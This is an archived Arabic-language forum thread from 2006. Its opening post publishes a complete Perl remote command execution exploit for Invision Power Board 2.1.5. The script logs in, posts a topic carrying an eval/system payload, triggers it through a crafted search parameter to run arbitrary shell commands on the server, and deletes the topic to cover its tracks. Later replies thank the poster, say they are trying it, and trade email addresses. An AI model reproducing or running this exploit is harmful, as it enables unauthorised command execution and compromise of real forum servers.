|
||||||
| أرشيف المنتدى هنا نقل الموضوعات المكررة والروابط التى لا تعمل |
|
|
أدوات الموضوع | ابحث في الموضوع | انواع عرض الموضوع |
|
#1
03-05-2006, 10:52 PM
|
||||
|
||||
السلام عليكم
حصريا على ثانويه لاول مره على المنتدايات العربيه هذه الثغره ثغره منتدايات Invision Power Board v2.1.5 مع الاستغلال الكود كود:
[COLOR=red]#!/usr/bin/perl[/COLOR] # Wed Apr 26 16:44:15 CEST 2006 jolascoaga at 514.es #[COLOR=purple]X x _ Y O U R I™ _ x X[/COLOR] # INVISION POWER BOARD 2.1.5 <www.invisionboard.com> pr00f 0f c0ncept # # remote command execution. vuln credits goes to IceShaman. # # works only if you have perms to post a comment. Exploit with replye is # in my TODO... #www.ELOSTAZ.com # 514 still r0xing. # !dSR the hardc0re hax0rs;) # There is no kwel comments in this release, wait for next upgrade #######################################################################/ use LWP::UserAgent; use HTTP::Cookies; use LWP::Simple; use HTTP::Request::Common "POST"; use HTTP::Response; use Getopt::Long; use strict; $| = 1; #;1 = |$ my ($proxy,$proxy_user,$proxy_pass,$lang); my ($arg_host,$debug,$ipb_user,$ipb_pass, $lang, $errors, $topic_index, $tmp_var); my ($md5_key, $post_key, $tmp_var); my %lang_es = ( * * * 'name' => 'Spanish Language', * * * 'login' => "Ahora est s identificado", * * * 'incorrect' => "Nombre de usuario o contrase a incorrectos", * * * 'deleted' => "Tema Eliminado" ); my %lang_en = ( * * * 'name' => 'English language', * * * 'login' => "You are now logged in", * * * 'incorrect' => "Sorry, we could not find a member using those log in details", * * * 'deleted' => 'Topic Deleted', ); my %lang_strings = (); my $ua = new LWP::UserAgent( * * * * * cookie_jar=> { file => "$$.cookie" }); my $options = GetOptions ( 'host=s' => \$arg_host, 'proxy=s' => \$proxy, 'proxy_user=s' => \$proxy_user, 'proxy_pass=s' => \$proxy_pass, 'ipb_user=s' => \$ipb_user, 'ipb_pass=s' => \$ipb_pass, 'lang=s' => \$lang, 'errors' => \$errors, 'debug' => \$debug); my ($host, $forum_index) = $arg_host =~ m/(http.*?)index.*?showforum=(.*)/; print "Host: $host\nForum Index: $forum_index\n" if $debug; &help unless ($host); # w0w0w0w0w0 is smarter than some one i know :D if (!$lang) { * * * lang_autodetect(); * * * print "Detected lang is: $lang_strings{'name'}\n" if $debug; } while (1){ * print "invvy:\\> "; * my $cmd = <STDIN>; * &invvy($cmd); } sub invvy { * * * chomp (my $cmd = shift); * * * LWP::Debug::level('+') if $debug; * * * $ua->agent("Morzilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!"); * * * $ua->proxy(['http'] => $proxy) if $proxy; * * * my $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; * * * ipb_login (); # This works with redirects enabled/disabled * * * ipb_post(); # Post in a main forum. * * * ipb_exec ($cmd); * * * ipb_delete ($forum_index, $topic_index); } # guglucitos team presents: sub help { * print "Syntax: ./$0 <url> [options]\n"; * print "\t--ipb_user, --ipb_pass (needed if dont allow anonymous posts)\n"; * print "\t--proxy (http), --proxy_user, --proxy_pass\n"; * print "\t--lang=[es|en] (default: autodetect)\n"; * print "\t--debug\n"; * print "\nExample\n"; * print "bash# $0 --host=http://www.somehost.com/index.php?showforum=2\n"; * print "\n"; * exit(1); } # sponsorized by coca-cola sub lang_autodetect { * my $req = HTTP::Request->new (GET => $host."/index.php"); * $ua->proxy(['http'] => $proxy) if $proxy; * $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; * print $req->as_string() if $debug; * my $res = $ua->request($req); * my $html = $res->content(); * if (($html =~ /Bienvenido,/) or ($html =~ /Fecha y Hora actual/)) { * * * * * * * %lang_strings = %lang_es; * * * * * * * return; * } * if (($html =~ /Welcome,/) or ($html =~ /Time is now/)) { * * * * * * * %lang_strings = %lang_en; * * * * * * * return; * } * print "Unknown lang switching to default: 'english'\n"; * %lang_strings = %lang_en; } # login function for 2.1.5 sub ipb_login { * * * my $content; * * * my $h = $host."/index.php?act=Login&CODE=01"; * * * print $h . "\n" if $debug; * * * my $req = POST $h,[ * * * * * * * 'referer' => $host, * * * * * * * 'UserName' => $ipb_user, * * * * * * * 'PassWord' => $ipb_pass, * * * * * * * 'CookieDate' => 1 * * * * * * * ]; #grab these, and send to dsr! * * * print $req->as_string() if $debug; * * * my $res = $ua->request($req); * * * if ($errors) { * * * * * * * print "[+] Context: Login in\n"; * * * * * * * print "HTTP Error code: ".$res->code()."\n"; * * * * * * * print "HTTP Location: ".$res->header("Location")."\n"; * * * * * * * my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s; * * * * * * * print "- ERROR -\nFind string: ".$lang_strings{'login'}."\n$error\n- ERROR -\n"; * * * } * * * if ($res->code() eq 302) { * * * * * * * $content = redirect ($res->header("Location")); * * * } else { * * * * * * * $content = $res->content(); * * * } * * * if ($content =~ /$lang_strings{'login'}/ or $content =~ /Logged in as/) { * * * * * print "Logged in\n" if $errors; * * * } else { * * * * *die "Can't log in\n"; * * * } } sub redirect { * my ($addr) = @_; * my $req = HTTP::Request->new (GET => $addr); * $ua->proxy(['http'] => $proxy) if $proxy; * $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; * print $req->as_string() if $debug; # MKSINK is r0xer * my $res = $ua->request($req); * my $html = $res->content(); * return $html; } sub ipb_post { * * * # This is for posting into a main index. * * * my $h = $host."/index.php?act=post&do=new_post&f=".$forum_index; * * * my $req = HTTP::Request->new (GET => $h); * * * $ua->proxy(['http'] => $proxy) if $proxy; * * * $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; * * * print $req->as_string() if $debug; #dirty_epic r0x++ * * * my $res = $ua->request($req); * * * my $html = $res->content(); * * * ($md5_key) = $html =~ m/var ipb_md5_check\s+= \"(.*?)\"/; * * * ($post_key) = $html =~ m/post_key' value='(.*?)'/; * * * print "AUTH check: $md5_key\n" if $debug; * * * print "POST key: $post_key\n" if $debug; * * * $tmp_var = int(rand(31337)); * * * my $exploitme = 'eval(system(getenv(HTTP_'.$tmp_var.'))); //'; # seeeeeei la weeeeei * * * $h = $host."/index.php"; * * * print $h."\n" if $debug; * * * my $req = POST $h, [ * * * * * * * 'st' => 0, * * * * * * * 'act' => "Post", * * * * * * * 's' => '', * * * * * * * 'f' => $forum_index, * * * * * * * 'auth_key' => $md5_key, * * * * * * * 'removeattachid' => 0, * * * * * * * 'MAX_FILE_SIZE' => 51200000, * * * * * * * 'CODE' => '01', * * * * * * * 'post_key' => $post_key, * * * * * * * 'TopicTitle' => '514 pwned', * * * * * * * 'TopicDesc' => '', * * * * * * * 'poll_question' => '', * * * * * * * 'ffont' => 0, * * * * * * * 'fsize' => 0, * * * * * * * 'Post' => $exploitme, * * * * * * * 'post_htmlstatus' => 0, * * * * * * * 'enableemo' => 'yes', * * * * * * * 'enablesig' => 'yes', * * * * * * * 'mod_options' => 'nowt', * * * * * * * 'iconid' => 0, * * * * * * * 'dosubmit' => 'Post New Topic' * * * * * * * ]; * * * $ua->proxy(['http'] => $proxy) if $proxy; * * * $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; * * * print $req->as_string() if $debug; * * * my $res = $ua->request($req); * * * my $html = $res->content(); * * * print "Location: ".$res->header("Location") if $debug; * * * ($topic_index) = $res->header("Location") =~ m/showtopic=(\d+)/; * * * if ($errors) { * * * * * * * print "[+] Context: Creating post\n"; * * * * * * * print "HTTP Error code: ".$res->code()."\n"; * * * * * * * print "HTTP Location: ".$res->header("Location")."\n"; * * * * * * * print "Topic Index: ".$topic_index."\n"; * * * * * * * my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s; * * * * * * * print "- ERROR -\nFind string: none\n$error\n- ERROR -\n"; * * * } } sub ipb_delete { * * * my ($fid, $tid) = @_; * * * my $req; * * * print "Deleting Topic: $tid from forum: $fid\n" if $debug; * * * my $h = $host."/index.php"; * * * $req = POST $h, [ * * * * * * * * * * * 'st' => 0, * * * * * * * * * * * 'act' => 'mod', * * * * * * * * * * * 'f' => $fid, * * * * * * * * * * * 'auth_key' => $md5_key, * * * * * * * * * * * 'CODE' => '08', * * * * * * * * * * * 't' => $tid, * * * * * * * * * * * 'submit' => 'Delete this topic' * * * * * * * ]; # **** windows automatic reboot * * * print $req->as_string() if $debug; * * * $ua->proxy(['http'] => $proxy) if $proxy; * * * $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; * * * my $res = $ua->request($req); * * * if ($errors) { * * * * * * * print "[+] Context: Deleting Topic\n"; * * * * * * * print "HTTP Error code: ".$res->code()."\n"; * * * * * * * print "HTTP Location: ".$res->header("Location")."\n"; * * * * * * * print "Topic Index: ".$topic_index."\n"; * * * * * * * my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s; * * * * * * * print "- ERROR -\nFind string: ".$lang_strings{'deleted'}."\n$error\n- ERROR -\n"; * * * } * * * # yow yow * * * if ($res->code() eq 200) { * * * * * * * *if ($res->content() =~ /$lang_strings{'deleted'}/) { * * * * * * * * * * * print "Topic $topic_index deleted\n" if $errors; * * * * * * * } else { * * * * * * * * * * * print "Maybe there was errors deleting post: $topic_index\n" if $errors; * * * * * * * } * * * } } # shhhhh this is hidden sub ipb_exec { * * * my ($cmd) = @_; * * * my $h = $host."/index.php?act=Search&CODE=01"; * * * my $req = POST $h, [ * * * * * * * * * * * 'keywords' => "HTTP_".$tmp_var, * * * * * * * * * * * 'namesearch' => '', * * * * * * * * * * * 'forums[]' => $forum_index, * * * * * * * * * * * 'prune' => 0, * * * * * * * * * * * 'prune_type' => 'newer', * * * * * * * * * * * 'result_type' => 'posts', * * * * * * * * * * * 'search_in' => 'posts', * * * * * * * * * * * 'sort_key' => 'last_post', * * * * * * * * * * * 'searchsubs' => '1' * * * * * * * ]; * * * print $req->as_string() if $debug; * * * $ua->proxy(['http'] => $proxy) if $proxy; * * * $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; * * * my $res = $ua->request($req); * * * my $html = $res->content(); * * * my ($redir) = $html =~ m/url_bit.*?\"(.*?)\"/; * * * print "Redirect to: $redir\n" if $errors; # don't ask * * * if ($errors) { * * * * * * * print "[+] Context: First search\n"; * * * * * * * print "HTTP Error code: ".$res->code()."\n"; * * * * * * * print "HTTP Location: ".$res->header("Location")."\n"; * * * * * * * print "Topic Index: ".$topic_index."\n"; * * * * * * * my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s; * * * * * * * print "- ERROR -\nFind string: none\n$error\n- ERROR -\n"; * * * } * * * if ($res->code eq 302) { * * * * * * * $redir = $res->header("Location"); * * * } * * * # piere - tonite is a great song * * * my $req = HTTP::Request->new (GET => $redir.'&lastdate=z|eval.*?%20//)%23e%00'); * * * $ua->proxy(['http'] => $proxy) if $proxy; * * * $req->header($tmp_var => 'echo STARTXPL;'.$cmd.';echo ENDXPL'); * * * $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; * * * print $req->as_string() if $debug; * * * my $res = $ua->request($req); * * * my $html = $res->content(); * * * $html =~ m/STARTXPL(.*?)ENDXPL/s; * * * print $1."\n"; * * * # no matter with you * * * if ($errors) { * * * * * * * print "[+] Context: Executed\n"; * * * * * * * print "HTTP Error code: ".$res->code()."\n"; * * * * * * * print "HTTP Location: ".$res->header("Location")."\n"; * * * * * * * print "Topic Index: ".$topic_index."\n"; * * * * * * * my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s; * * * * * * * print "- ERROR -\nFind string: none\n$error\n- ERROR -\n"; * * * } } لاستغلالها من نظام الوويندوز لازم يكون عندك برنامج ActivePerl سلام واى استفسار انا موجود . Y O U R I ™ Z 0n1
__________________
Nobody gets too much heaven no more, itz much harder to come by Nobody gets too much love no more, But I ..:: ^^ Youri <33's Jaleesz ^^ ::.. * quote from Dusty * Like jaleesz is a lovely dovey stuffs, isnt she 
|
|
#3
04-05-2006, 02:25 PM
|
||||
|
||||
|
سورى يا نجم اقرأ الموضوع تانى
الثغره زى ما هوه واضح اكتشاف هذا الاسبوع ده اول حاجه تانى حاجه ثغرات ايه التانيه اللى فى IPB تقصد يعنى البيرل التانيه . . اغلب الثغرات دى مش شغال سلام ولو انت عايزنى كل يوم انزل ثغره انت تأمر بس مين اللى هيفهمها ومين اللى هيطبقها انا نزلت الثغره دى لانها جديده لانج وكمان لانها سهله وبلغه البيرل يعنى مفيش اتفه من كده ولانها كمان اول مره فى المنتدايات العربيه سلام
__________________
Nobody gets too much heaven no more, itz much harder to come by Nobody gets too much love no more, But I ..:: ^^ Youri <33's Jaleesz ^^ ::.. * quote from Dusty * Like jaleesz is a lovely dovey stuffs, isnt she
|
|
#4
08-05-2006, 12:01 PM
|
|||
|
|||
|
يورى انا عايز منك حاجة خاصة اوى بجد
__________________
<div align="center">SecuritY Is My GamE  </div>
|
|
#5
08-05-2006, 03:01 PM
|
||||
|
||||
|
مشكووووور يا يورى
__________________
إميلى لأى حد عايز يتعلم هاك teto07777777@yahoo.com teto_nethak0777@hotmail.com DonT PlaY WitH Me |
|
#6
08-05-2006, 06:25 PM
|
||||
|
||||
|
السلام عليكم
شكرا لكل اللى ردوا tarekalbolkeny اوكى يا مان انت تأمر عايز ايه ( لو حاجه خاصه قوى ممكن تكلمنى على الاميل egy_prince27@hotmail.com بس يبقى قولى اميلك فى رساله خاصه لانى معندش بقبل الاضافه من زمان بسبب العدد وصل ل 600 ومنصحكش انك تتكلم فى رساله خاصه لوالموضوع مهم بالنسبه لك لان الرسايل الخاصه ممكن تتقرأ عن طريق الادمن بنل اوكى سلام ومنتظرك
__________________
Nobody gets too much heaven no more, itz much harder to come by Nobody gets too much love no more, But I ..:: ^^ Youri <33's Jaleesz ^^ ::.. * quote from Dusty * Like jaleesz is a lovely dovey stuffs, isnt she
|
|
#7
08-05-2006, 06:29 PM
|
|||
|
|||
يورى ممكن اطلب منك الباسوورد الخاص بالمراجعة الشاملة للاقتصاد الى على موقع الاستاذ لانى محتاج اطبعها ضرورى و مش عارف علشان انا لا استطيع ان افتح الكمبيوتر فى الايام القادمة لو [SIZE=14][COLOR=blue]سمحت please
|
|
#8
08-05-2006, 06:48 PM
|
||||
|
||||
|
مودى
كفايه الرساله الخاصه انا مش عارف انت بتتكلم عن ايه. سلام وانا بعتلك رساله الكلام على الرسائل رغم انه عندى 10 رسائل فى اليوم مش عارف اعمل ايه :  C u
__________________
Nobody gets too much heaven no more, itz much harder to come by Nobody gets too much love no more, But I ..:: ^^ Youri <33's Jaleesz ^^ ::.. * quote from Dusty * Like jaleesz is a lovely dovey stuffs, isnt she
|
|
#9
09-05-2006, 12:43 PM
|
|||
|
|||
|
يورى انت مش بتفتح الايميل انا ايميلى اهه عشان تقبله tito_200563@hotmail.com اوك سلالالام
__________________
<div align="center">SecuritY Is My GamE </div>
|
|
#10
09-05-2006, 06:38 PM
|
||||
|
||||
|
اوكى يا حبيبى ان شاء الله اوافق على الاضافه اول ما احذف واحد من اميلى
سلام
__________________
Nobody gets too much heaven no more, itz much harder to come by Nobody gets too much love no more, But I ..:: ^^ Youri <33's Jaleesz ^^ ::.. * quote from Dusty * Like jaleesz is a lovely dovey stuffs, isnt she
|
|
#11
01-07-2006, 09:59 AM
|
|||
|
|||
|
بسم الله الرحمن الرحيم
شكرا يورى على هذه الثغرة وجارى التجريب
__________________
<div align="center"> لا اله الا الله وحده لا شريك له   </div> |
|
#12
01-07-2006, 11:05 AM
|
|||
|
|||
|
ياااااااااه ايه يا ابنى اللى خلاك تفتح الموضوع ده ههههه
اوك هى ثغرة حلوة بس بيرل
__________________
<div align="center">SecuritY Is My GamE </div>
|
|
#13
14-01-2007, 05:48 AM
|
||||
|
||||
|
ثغره حلوه . بس بيرل . تبقى ثغره ممتازه .
مش فاهم انت ايه مشكلتك مع البيرل .. ؟؟
__________________
Nobody gets too much heaven no more, itz much harder to come by Nobody gets too much love no more, But I ..:: ^^ Youri <33's Jaleesz ^^ ::.. * quote from Dusty * Like jaleesz is a lovely dovey stuffs, isnt she
|
|
#14
14-01-2007, 12:31 PM
|
||||
|
||||
|
أنا أحب أقرأ موضوع الثغرات لكن ما بحاول أجرب عملي
شكراً جزيلاً يوري وننتظر جديدك إن شاء الله |
|
#15
17-02-2007, 09:07 PM
|
|||
|
|||
|
شكرااا على الموضوع
|
| العلامات المرجعية |
«
الموضوع السابق
|
الموضوع التالي
»
العرض العادي
|
|
جميع الأوقات بتوقيت GMT +2. الساعة الآن 09:26 PM.
